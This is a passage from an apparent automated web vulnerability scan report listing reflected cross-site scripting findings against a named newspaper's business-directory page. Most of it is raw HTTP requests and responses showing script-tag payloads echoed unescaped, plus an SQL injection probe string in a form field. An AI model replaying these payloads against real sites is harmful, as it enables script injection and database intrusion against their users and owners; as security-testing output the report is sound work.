2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91521
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsA" value="125-560826,125-549432,125-552794,125-545063,125-552800,125-549795,125-552790,125-552796,125-551814,125-545983ec84d"><script>alert(1)</script>800b6613f6fe0038c">
...[SNIP]...

4.268. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsAA parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsAA request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f1f6"><script>alert(1)</script>569bedb2e8f29862f was submitted in the sLsIdsAA parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-5608174f1f6"><script>alert(1)</script>569bedb2e8f29862f&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91541
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADQTTDT=JANHKJGAMEMKBLKIAFLPJLMA; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsAA" value="125-553610,125-518851,125-553607,125-556074,125-558240,125-499512,125-526065,125-462985,125-544762,125-5608174f1f6"><script>alert(1)</script>569bedb2e8f29862f">
...[SNIP]...

4.269. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsAA parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsAA request parameter is copied into the HTML document as plain text between tags. The payload ee193<script>alert(1)</script>886b1ad893a was submitted in the sLsIdsAA parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817ee193<script>alert(1)</script>886b1ad893a&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c1
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:32:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817ee193<script>alert(1)</script>886b1ad893a&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c12
...[SNIP]...

4.270. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsAB parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsAB request parameter is copied into the HTML document as plain text between tags. The payload 6e196<script>alert(1)</script>f7f0823e42f was submitted in the sLsIdsAB parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-5425066e196<script>alert(1)</script>f7f0823e42f&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c1
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:32:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-5425066e196<script>alert(1)</script>f7f0823e42f&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c12
...[SNIP]...

4.271. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsAB parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsAB request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f36d"><script>alert(1)</script>170db026d9641dabd was submitted in the sLsIdsAB parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-5425062f36d"><script>alert(1)</script>170db026d9641dabd&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c1